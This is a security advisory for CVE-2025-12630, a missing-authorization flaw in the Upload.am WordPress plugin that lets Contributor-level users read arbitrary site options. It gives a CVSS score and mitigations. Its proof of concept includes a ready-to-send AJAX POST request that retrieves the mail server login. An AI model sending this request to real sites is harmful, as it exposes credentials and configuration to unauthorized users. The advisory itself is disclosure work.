WordPress Upload.am – Contributor+ Arbitrary Option Disclosure (CVE-2025-12630)

Author: Beatriz Fresno Naumova (beafn28)

Date: 29/09/2025

Vendor: Upload.am

Product: Upload.am File Hosting VPN (WordPress Plugin)

Versions affected: < 1.0.1

Component: AJAX request handler – option retrieval

CWE: CWE-862 – Missing Authorization

OWASP: A5 – Broken Access Control

Attack type: Remote

Impact: Information Disclosure

Description

The Upload.am File Hosting VPN WordPress plugin versions prior to 1.0.1 contain a missing authorization vulnerability in an AJAX request handler. The affected endpoint does not perform a proper capability check, allowing authenticated users with low privileges (such as Contributor) to retrieve arbitrary WordPress site options.

This lack of authorization enforcement enables unauthorized access to sensitive configuration values that should be restricted to administrative roles.

Impact

Primary impact: Information disclosure of WordPress site options.

Consequences:

Exposure of sensitive configuration data
Facilitation of further attacks through reconnaissance
Increased risk of privilege escalation or targeted exploitation

Attack Details

Attack Vector (AV): Network (N)
Attack Complexity (AC): Low (L)
Privileges Required (PR): Low (L)
User Interaction (UI): None (N)
Scope (S): Unchanged (U)
Confidentiality (C): Low (L)
Integrity (I): None (N)
Availability (A): None (N)

CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

CVSS v3.1 Base Score: 4.9 (Medium)

POC

1. As a contributor+, go to the new post screen: /wp-admin/post-new.php
2. View the page source and search the codef or `var uploadAmSettings`
3. Use the nonce to send the following post request:

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in_xxx=value

action=upload_am_get_option&option_name=mailserver_login&nonce=VALID_NONCE_HERE
```

The response will share the `mailserver_login`

Mitigation

Enforce capability checks: Validate user permissions using current_user_can() in all AJAX handlers.
Least privilege enforcement: Prevent contributor-level users from accessing site-wide configuration options.
Proper error handling: Return 403 Forbidden responses for unauthorized access attempts.
Security testing: Add regression tests to ensure authorization checks are enforced on all endpoints.
Code audit: Review similar AJAX handlers for repeated authorization flaws.

Discoverer

Beatriz Fresno Naumova (beafn28)

References

CVE: https://www.cve.org/CVERecord?id=CVE-2025-12630
WPSCAN: 531537f1-5547-4b0f-9e11-3f8a0b2589f5
NIST: https://nvd.nist.gov/vuln/detail/CVE-2025-12630

PreviousBroken Access Control in LibreTime analytics endpoints (CVE-2025-60427)NextDirectus < 11.13.0 – Improper Permission Handling on Deleted Fields (CVE-2025-64746)

Last updated 11 hours ago

Was this helpful?